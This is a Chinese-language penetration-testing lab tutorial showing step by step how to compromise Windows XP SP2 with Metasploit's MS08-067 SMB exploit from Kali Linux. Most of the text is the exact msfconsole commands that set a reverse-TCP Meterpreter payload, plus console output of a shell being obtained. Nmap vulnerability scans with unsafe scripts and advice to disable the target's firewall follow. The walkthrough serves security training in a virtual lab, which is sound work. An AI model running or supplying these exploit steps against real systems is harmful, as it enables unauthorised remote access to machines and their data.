Metasploit 攻击winXP

本次实验会用到以下资源：

Kali linux 镜像

windows XP SP2 镜像

进入kali linux进行渗透：

# msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST TARGETIP

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST YOURIP

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.71.105:4445 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800


meterpreter > shell

Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

以上就是渗透过程，如果最终没有显示出 meterpreter，则说明渗透不成功，可以参考以下步骤进行：

扫描靶机漏洞端口是否可以攻击

nmap -p 445 -script smb-check-vulns -script-args=unsafe=1TARGETIP

输出结果：

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)

Host script results:
| smb-check-vulns: 
|   Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

结果中并没有 MS08-067: VULNERABLE，所以无法利用，注意本实验用的是MS08-067漏洞，windows xp sp2是有的。

换成 xp sp2 继续扫描：

nmap -p 445 -script smb-check-vulns -script-args=unsafe=1TARGETIP

输出结果：

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)


Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds

如果端口状态为 filtered，则是被防火墙屏蔽，此时我们可以关闭靶机的防火墙，继续扫描：

输出结果：

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)


Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)


Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds

漏洞可用，此时可按照上面的步骤进行渗透。